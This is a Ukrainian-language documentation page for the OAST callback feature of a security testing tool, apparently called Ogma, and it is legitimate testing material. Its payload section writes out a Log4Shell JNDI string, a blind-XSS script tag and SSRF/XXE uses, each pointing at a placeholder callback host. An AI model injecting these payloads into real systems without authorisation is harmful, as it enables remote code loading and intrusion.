---
url: https://docs.ogmabox.com/uk/app/utilities/oast.md
description: >-
  Налаштовуйте зворотні виклики для позасмугового тестування безпеки застосунків
  в Ogma.
---

# OAST {#oast}

OAST (Out-of-Band Application Security Testing) виявляє вразливості без видимої відповіді: натомість ціль встановлює вихідне з’єднання з приймачем, який ви контролюєте, підтверджуючи проблему.

## Як це працює {#how-it-works}

Ogma запускає локальні приймачі для кількох протоколів. Коли цільовий застосунок звертається до одного з них, взаємодія записується з IP-адресою джерела, часом, отриманими даними й токеном, який було впроваджено.

### Протоколи приймачів {#listener-protocols}

| Протокол | Типовий порт | Використання |
|---|---|---|
| HTTP | Налаштовується | SSRF, сліпий XSS, вебхуки |
| HTTPS | Налаштовується | SSRF через TLS |
| DNS | Налаштовується | Сліпі ін’єкції, XXE, log4shell |
| SMTP | Налаштовується | Ін’єкція заголовків пошти, SSRF до поштових служб |

Налаштуйте порти приймачів і доменне ім’я для згенерованих токенів на панелі налаштувань OAST.

## Створення токена зворотного виклику {#generating-a-callback-token}

1. Відкрийте **Утиліти > OAST**.
2. Натисніть **+ Створити**, а потім **Створити**. Кожен токен унікальний для тесту.
3. Скопіюйте токен. Він містить домен приймача й унікальний ідентифікатор для зіставлення взаємодій із конкретним тестом.

Приклад формату токена: `[unique-id].[your-oast-domain]`

## Використання токенів у навантаженнях {#using-tokens-in-payloads}

Впроваджуйте токен зворотного виклику в будь-яке поле, через яке застосунок може встановити вихідне з’єднання:

* **SSRF** — використовуйте токен HTTP/HTTPS як цільовий URL: `https://[token]/`
* **XXE** — посилайтеся на токен у DOCTYPE або URL зовнішньої сутності.
* **Log4Shell** — додайте в заголовок: `${jndi:ldap://[token]/a}`
* **Сліпий XSS** — використовуйте як src скрипта: `<script src="https://[token]/x.js"></script>`
* **Ін’єкція SMTP** — використовуйте як адресу призначення або URL у заголовках пошти.

## Журнал взаємодій {#interactions-log}

Панель взаємодій показує кожен отриманий зворотний виклик:

| Стовпець | Опис |
|---|---|
| Час | Коли отримано взаємодію |
| Протокол | HTTP, HTTPS, DNS або SMTP |
| IP джерела | IP-адреса, що встановила з’єднання |
| Токен | До якого токена звернулися |
| Дані | Шлях запиту, ім’я запиту DNS або дані SMTP |

Натисніть будь-який рядок, щоб побачити повні подробиці взаємодії, зокрема заголовки й тіло запиту, де це доречно.

## Зіставлення взаємодій із тестами {#matching-interactions-to-tests}

Оскільки кожен токен унікальний, можна впроваджувати різні токени в різні параметри або запити й точно визначати, яка точка ін’єкції спричинила зворотний виклик.

## Пов’язані сторінки {#related-pages}

* [Сканер](./scanner.md)
* [Знахідки](../findings.md)
